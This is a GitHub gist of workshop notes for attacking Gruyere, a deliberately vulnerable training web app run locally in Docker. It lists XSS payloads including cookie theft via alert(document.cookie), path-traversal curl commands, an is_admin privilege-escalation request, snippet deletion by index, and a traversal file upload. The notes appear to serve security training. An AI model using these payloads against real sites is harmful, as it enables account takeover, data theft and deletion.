Skip to content

Instantly share code, notes, and snippets.

@apolloclark

apolloclark/gruyere workshop.md

Last active October 20, 2016 23:46
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save apolloclark/d10a8875e0e0728b0b1c9e217e34ddce to your computer and use it in GitHub Desktop.
Save apolloclark/d10a8875e0e0728b0b1c9e217e34ddce to your computer and use it in GitHub Desktop.
Download ZIP
Raw
gruyere workshop.md

Docker SSH

# run the Gruyere container
docker run -d -p 8008:8008 karthequian/gruyere

# list running containers
docker ps

# run Ash
docker exec -i -t <docker_id> /bin/ash

# run Ash, on first container instance
docker exec -it $(docker ps | awk 'FNR == 2 {print $1}') /bin/ash

# quit with "ctrl+pq"

XSS

/snippets.gtl?uid=test /snippets.gtl?uid=+%3Cscript%3Ealert("XSSed!")%3C/script%3E

<script>document.write(0 + 1)</script>

XSS, File

[test.html]
<script>
alert(document.cookie);
</script>

/test/test.html

XSS, Snippet

You'll notice the <script> tag is replaced by <blocked/>

<a onmouseover="alert(1)" href="#">read this!</a>

Cookie manipulation

create a user with the name "foo|admin|author"

Priv Escalation

Do a GET to: /saveprofile?action=update&is_admin=True

Info Disclosure

curl  http://127.0.0.1:8008/<instance_id>/../secret.txt
curl  http://127.0.0.1:8008/<instance_id>/..%2fsecret.txt
# this is crashing the Docker container...

Direct Object Reference

# delete another users's data
/deletesnippet?index=0

Remote file inclusion

[secret.txt]
I'm in ur filez

cd ~/Desktop

curl \
  --cookie "<hash>|test|admin|author"
  -F "upload_file=@secret.txt;filename='../secret.txt'" \
  http://127.0.0.1:8008/<instance_id>/upload2
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment